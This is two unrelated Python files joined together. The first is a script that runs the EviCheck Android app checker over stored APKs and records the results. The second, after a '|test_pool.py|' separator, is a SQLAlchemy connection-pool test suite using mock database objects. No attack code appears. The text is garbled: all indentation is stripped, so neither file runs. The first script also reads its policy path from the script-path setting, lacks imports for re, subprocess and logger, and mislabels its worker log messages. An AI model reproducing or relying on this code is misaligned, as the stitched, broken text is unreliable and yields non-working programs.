from db.Certificates import Certificates
from db.Apps import Apps
from db.Malware import Malware
# initialize configuration parser
import ConfigParser
from multiprocessing import Process
config = ConfigParser.RawConfigParser()
config.read('config.prop')
# get configuration parameter
eviscript = config.get('tools', 'evi.script.file')
evipolicy = config.get('tools', 'evi.script.file')
path = config.get('apps', 'apps.fs.dir')
def evicheck(appslist):
"""
runs the EviCheck tool on a list of apps and stores results
as log files and database entries
:param appslist:
:return:
"""
p_result = re.compile(".*Policy valid!.*")
for apk in appslist:
app = Apps()
app.path_to_apk = apk[1]
app.package = apk[0]
certFile = path + app.package + "/EviCheck.cert"
logFile = path + app.package + "/EviCheck.log"
logger.info("%s running EviCheck", app.package)
malware = Malware()
malware.package = app.package
malware.logfile = logFile
malware.tool = "EviCheck"
cmd = ["python", eviscript, "-f", app.path_to_apk, "-g", "-p", evipolicy, "-t", certFile,
"-m"] # there are RSA and DSA certificates; cater for both
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if err:
logger.error(err)
continue
else:
lines = out.splitlines()
log = open(logFile, 'w')
log.writelines(lines)
log.close()
global a # init variable
for line in lines:
a = p_result.match(line)
if a:
malware.result = "valid"
logger.info("%s is valid", app.package)
break
if not a:
malware.result = "invalid"
logger.info("%s is not valid", app.package)
malware.insert()
# just a helper function
def chunkify(lst,n):
return [ lst[i::n] for i in xrange(n) ]
def do():
"""
runs EviCheck on multiple threads
:return:
"""
# get all apks which are linked in the database
# will come with [0] package [1] path_to_apk
appsList = Apps().getAllApps()
threads = []
for list in chunkify(appsList, 4):
p = Process(target=evicheck, args=(list,))
logger.info("starting mallodroid thread %s", p)
threads += [p]
p.start()
for t in threads:
t.join()
|
test_pool.py
|
import threading
import time
from sqlalchemy import pool, select, event
import sqlalchemy as tsa
from sqlalchemy import testing
from sqlalchemy.testing.util import gc_collect, lazy_gc
from sqlalchemy.testing import eq_, assert_raises, is_not_
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.mock import Mock, call
def MockDBAPI():
def cursor():
while True:
yield Mock()
def connect():
while True:
yield Mock(cursor=Mock(side_effect=cursor()))
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect())
db = Mock(connect=Mock(side_effect=connect()),
shutdown=shutdown, _shutdown=False)
return db
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return dbapi, pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
**kw)
class PoolTest(PoolTestBase):
def test_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=True)
c1 = manager.connect('foo.db')
c2 = manager.connect('foo.db')
c3 = manager.connect('bar.db')
c4 = manager.connect("foo.db", bar="bat")
c5 = manager.connect("foo.db", bar="hoho")
c6 = manager.connect("foo.db", bar="bat")
assert c1.cursor() is not None
assert c1 is c2
assert c1 is not c3
assert c4 is c6
assert c4 is not c5
def test_manager_with_key(self):
dbapi = MockDBAPI()
manager = pool.manage(dbapi, use_threadlocal=True)
c1 = manager.connect('foo.db', sa_pool_key="a")
c2 = manager.connect('foo.db', sa_pool_key="b")
c3 = manager.connect('bar.db', sa_pool_key="a")
assert c1.cursor() is not None
assert c1 is not c2
assert c1 is c3
eq_(dbapi.connect.mock_calls,
[
call("foo.db"),
call("foo.db"),
]
)
def test_bad_args(self):
manager = pool.manage(MockDBAPI())
manager.connect(None)
def test_non_thread_local_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=False)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is not connection2)
@testing.fails_on('+pyodbc',
"pyodbc cursor doesn't implement tuple __eq__")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1, )]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (pool.SingletonThreadPool, pool.StaticPool,
pool.QueuePool, pool.NullPool, pool.AssertionPool):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def testthreadlocal_del(self):
self._do_testthreadlocal(useclose=False)
def testthreadlocal_close(self):
self._do_testthreadlocal(useclose=True)
def _do_testthreadlocal(self, useclose=False):
dbapi = MockDBAPI()
for p in pool.QueuePool(creator=dbapi.connect,
pool_size=3, max_overflow=-1,
use_threadlocal=True), \
pool.SingletonThreadPool(creator=dbapi.connect,
use_threadlocal=True):
c1 = p.connect()
c2 = p.connect()
self.assert_(c1 is c2)
c3 = p.unique_connection()
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
c2 = p.connect()
self.assert_(c1 is c2)
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
if useclose:
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
c3.close()
c2.close()
self.assert_(c1.connection is not None)
c1.close()
c1 = c2 = c3 = None
# extra tests with QueuePool to ensure connections get
# __del__()ed when dereferenced
if isinstance(p, pool.QueuePool):
lazy_gc()
self.assert_(p.checkedout() == 0)
c1 = p.connect()
c2 = p.connect()
if useclose:
c2.close()
c1.close()
else:
c2 = None
c1 = None
lazy_gc()
self.assert_(p.checkedout() == 0)
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.info)
c.invalidate()
c = p.connect()
self.assert_('foo' not in c.info)
c.info['foo2'] = 'bar2'
c.detach()
self.assert_('foo2' in c.info)
c2 = p.connect()
is_not_(c.connection, c2.connection)
assert not c2.info
assert 'foo2' in c.info
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append('R')
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append('C')
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append('CL')
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ['R', 'CL', 'R'])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ['R', 'CL', 'R'])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ['R', 'CL', 'R'])
def test_null_pool(self):
self._do_test(pool.NullPool, ['R', 'CL', 'R', 'CL'])
def test_static_pool(self):
self._do_test(pool.StaticPool, ['R', 'R'])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append('first_connect')
event.listen(p, 'first_connect', first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append('connect')
event.listen(p, 'connect', connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append('checkout')
event.listen(p, 'checkout', checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append('checkin')
event.listen(p, 'checkin', checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append('reset')
event.listen(p, 'reset', reset)
return p, canary
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
eq_(canary, ['connect'])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
eq_(canary, ['checkout'])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['reset'])
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ['checkin'])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
c2.close()
eq_(canary, ['checkin', 'checkin'])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, 'connect', listen_one)
event.listen(engine.pool, 'connect', listen_two)
event.listen(engine, 'connect', listen_three)
event.listen(engine.__class__, 'connect', listen_four)
engine.execute(select([1])).close()
eq_(
canary,
["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, 'connect', listen_one)
event.listen(pool.QueuePool, 'connect', listen_two)
event.listen(pool.SingletonThreadPool, 'connect', listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class DeprecatedPoolListenerTest(PoolTestBase):
@testing.requires.predictable_gc
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners(self):
class InstrumentingListener(object):
def __init__(self):
if hasattr(self, 'connect'):
self.connect = self.inst_connect
if hasattr(self, 'first_connect'):
self.first_connect = self.inst_first_connect
if hasattr(self, 'checkout'):
self.checkout = self.inst_checkout
if hasattr(self, 'checkin'):
self.checkin = self.inst_checkin
self.clear()
def clear(self):
self.connected = []
self.first_connected = []
self.checked_out = []
self.checked_in = []
def assert_total(innerself, conn, fconn, cout, cin):
eq_(len(innerself.connected), conn)
eq_(len(innerself.first_connected), fconn)
eq_(len(innerself.checked_out), cout)
eq_(len(innerself.checked_in), cin)
def assert_in(innerself, item, in_conn, in_fconn,
in_cout, in_cin):
self.assert_((item in innerself.connected) == in_conn)
self.assert_((item in innerself.first_connected) == in_fconn)
self.assert_((item in innerself.checked_out) == in_cout)
self.assert_((item in innerself.checked_in) == in_cin)
def inst_connect(self, con, record):
print("connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.connected.append(con)
def inst_first_connect(self, con, record):
print("first_connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.first_connected.append(con)
def inst_checkout(self, con, record, proxy):
print("checkout(%s, %s, %s)" % (con, record, proxy))
assert con is not None
assert record is not None
assert proxy is not None
self.checked_out.append(con)
def inst_checkin(self, con, record):
print("checkin(%s, %s)" % (con, record))
# con can be None if invalidated
assert record is not None
self.checked_in.append(con)
class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener):
pass
class ListenConnect(InstrumentingListener):
def connect(self, con, record):
pass
class ListenFirstConnect(InstrumentingListener):
def first_connect(self, con, record):
pass
class ListenCheckOut(InstrumentingListener):
def checkout(self, con, record, proxy, num):
pass
class ListenCheckIn(InstrumentingListener):
def checkin(self, con, record):
pass
def assert_listeners(p, total, conn, fconn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.dispatch.connect) == conn)
self.assert_(len(instance.dispatch.first_connect) == fconn)
self.assert_(len(instance.dispatch.checkout) == cout)
self.assert_(len(instance.dispatch.checkin) == cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0, 0)
p.add_listener(ListenAll())
assert_listeners(p, 1, 1, 1, 1, 1)
p.add_listener(ListenConnect())
assert_listeners(p, 2, 2, 1, 1, 1)
p.add_listener(ListenFirstConnect())
assert_listeners(p, 3, 2, 2, 1, 1)
p.add_listener(ListenCheckOut())
assert_listeners(p, 4, 2, 2, 2, 1)
p.add_listener(ListenCheckIn())
assert_listeners(p, 5, 2, 2, 2, 2)
del p
snoop = ListenAll()
p = self._queuepool_fixture(listeners=[snoop])
assert_listeners(p, 1, 1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
cc = c.connection
snoop.assert_in(cc, True, True, True, False)
c.close()
snoop.assert_in(cc, True, True, True, True)
del c, cc
snoop.clear()
# this one depends on immediate gc
c = p.connect()
cc = c.connection
snoop.assert_in(cc, False, False, True, False)
snoop.assert_total(0, 0, 1, 0)
del c, cc
lazy_gc()
snoop.assert_total(0, 0, 1, 1)
p.dispose()
snoop.clear()
c = p.connect()
c.close()
c = p.connect()
snoop.assert_total(1, 0, 2, 1)
c.close()
snoop.assert_total(1, 0, 2, 2)
# invalidation
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.invalidate()
snoop.assert_total(1, 0, 1, 1)
c.close()
snoop.assert_total(1, 0, 1, 1)
del c
lazy_gc()
snoop.assert_total(1, 0, 1, 1)
c = p.connect()
snoop.assert_total(2, 0, 2, 1)
c.close()
del c
lazy_gc()
snoop.assert_total(2, 0, 2, 2)
# detached
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.detach()
snoop.assert_total(1, 0, 1, 0)
c.close()
del c
snoop.assert_total(1, 0, 1, 0)
c = p.connect()
snoop.assert_total(2, 0, 2, 0)
c.close()
del c
snoop.assert_total(2, 0, 2, 1)
# recreated
p = p.recreate()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
c.close()
snoop.assert_total(1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 2, 1)
c.close()
snoop.assert_total(1, 1, 2, 2)
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners_callables(self):
def connect(dbapi_con, con_record):
counts[0] += 1
def checkout(dbapi_con, con_record, con_proxy):
counts[1] += 1
def checkin(dbapi_con, con_record):
counts[2] += 1
i_all = dict(connect=connect, checkout=checkout, checkin=checkin)
i_connect = dict(connect=connect)
i_checkout = dict(checkout=checkout)
i_checkin = dict(checkin=checkin)
for cls in (pool.QueuePool, pool.StaticPool):
counts = [0, 0, 0]
def assert_listeners(p, total, conn, cout, cin):
for instance in (p, p.recreate()):
eq_(len(instance.dispatch.connect), conn)
eq_(len(instance.dispatch.checkout), cout)
eq_(len(instance.dispatch.checkin), cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0)
p.add_listener(i_all)
assert_listeners(p, 1, 1, 1, 1)
p.add_listener(i_connect)
assert_listeners(p, 2, 1, 1, 1)
p.add_listener(i_checkout)
assert_listeners(p, 3, 1, 1, 1)
p.add_listener(i_checkin)
assert_listeners(p, 4, 1, 1, 1)
del p
p = self._queuepool_fixture(listeners=[i_all])
assert_listeners(p, 1, 1, 1, 1)
c = p.connect()
assert counts == [1, 1, 0]
c.close()
assert counts == [1, 1, 1]
c = p.connect()
assert counts == [1, 2, 1]
p.add_listener(i_checkin)
c.close()
assert counts == [1, 2, 2]
class QueuePoolTest(PoolTestBase):
def testqueuepool_del(self):
self._do_testqueuepool(useclose=False)
def testqueuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1)
def status(pool):
tup = pool.size(), pool.checkedin(), pool.overflow(), \
pool.checkedout()
print('Pool size: %d Connections in pool: %d Current '\
'Overflow: %d Current Checked out connections: %d' % tup)
return tup
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=0,
timeout=2)
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
now = time.time()
try:
c4 = p.connect()
assert False
except tsa.exc.TimeoutError:
assert int(time.time() - now) == 2
@testing.requires.threading_with_mock
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=.05),
pool_size=2,
max_overflow=1, use_threadlocal=False, timeout=3)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
dbapi = MockDBAPI()
def creator():
time.sleep(.05)
return dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=3, timeout=2,
max_overflow=max_overflow)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join()
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
@testing.requires.threading_with_mock
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(creator=creator,
pool_size=2, timeout=timeout,
max_overflow=max_overflow)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(.1)
conn.close()
c1 = p.connect()
c2 = p.connect()
for i in range(2):
t = threading.Thread(target=waiter,
args=(p, timeout, max_overflow))
t.setDaemon(True) # so the tests dont hang if this fails
t.start()
c1.invalidate()
c2.invalidate()
p2 = p._replace()
time.sleep(.2)
eq_(len(success), 12, "successes: %s" % success)
@testing.requires.threading_with_mock
@testing.requires.python26
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator1():
canary.append(1)
return dbapi.connect()
def creator2():
canary.append(2)
return dbapi.connect()
p1 = pool.QueuePool(creator=creator1,
pool_size=1, timeout=None,
max_overflow=0)
p2 = pool.QueuePool(creator=creator2,
pool_size=1, timeout=None,
max_overflow=-1)
def waiter(p):
conn = p.connect()
time.sleep(.5)
conn.close()
c1 = p1.connect()
for i in range(5):
t = threading.Thread(target=waiter, args=(p1, ))
t.setDaemon(True)
t.start()
time.sleep(.5)
eq_(canary, [1])
p1._pool.abort(p2)
time.sleep(1)
eq_(canary, [1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=dbapi.connect,
pool_size=2, timeout=None,
max_overflow=0)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_mixed_close(self):
pool._refs.clear()
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = None
assert p.checkedout() == 1
c1 = None
lazy_gc()
assert p.checkedout() == 0
lazy_gc()
assert not pool._refs
def test_overflow_no_gc_tlocal(self):
self._test_overflow_no_gc(True)
def test_overflow_no_gc(self):
self._test_overflow_no_gc(False)
def _test_overflow_no_gc(self, threadlocal):
p = self._queuepool_fixture(pool_size=2,
max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0])
)
@testing.requires.predictable_gc
def test_weakref_kaboom(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2 = None
del c1
del c2
gc_collect()
assert p.checkedout() == 0
c3 = p.connect()
assert c3 is not None
def test_trick_the_counter(self):
"""this is a "flaw" in the connection pool; since threadlocal
uses a single ConnectionFairy per thread with an open/close
counter, you can fool the counter into giving you a
ConnectionFairy with an ambiguous counter. i.e. its not true
reference counting."""
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = p.connect()
c2.close()
self.assert_(p.checkedout() != 0)
c2.close()
self.assert_(p.checkedout() == 0)
def test_recycle(self):
p = self._queuepool_fixture(pool_size=1,
max_overflow=0,
recycle=3)
c1 = p.connect()
c_id = id(c1.connection)
c1.close()
c2 = p.connect()
assert id(c2.connection) == c_id
c2.close()
time.sleep(4)
c3 = p.connect()
assert id(c3.connection) != c_id
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises(
Exception,
p.connect
)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = p.connect()
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = p.connect()
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = p.connect()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1,
max_overflow=2, recycle=1)
c1 = p.connect()
c1.close()
time.sleep(1)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(reset_on_return=None, pool_size=1, max_overflow=0)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._use_threadlocal is False
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect()
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_threadfairy(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c1.close()
c2 = p.connect()
assert c2.connection is not None
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
@testing.requires.threading_with_mock
def test_cleanup_no_gc(self):
self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(.1)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(p._all_conns) == 3
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect()
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
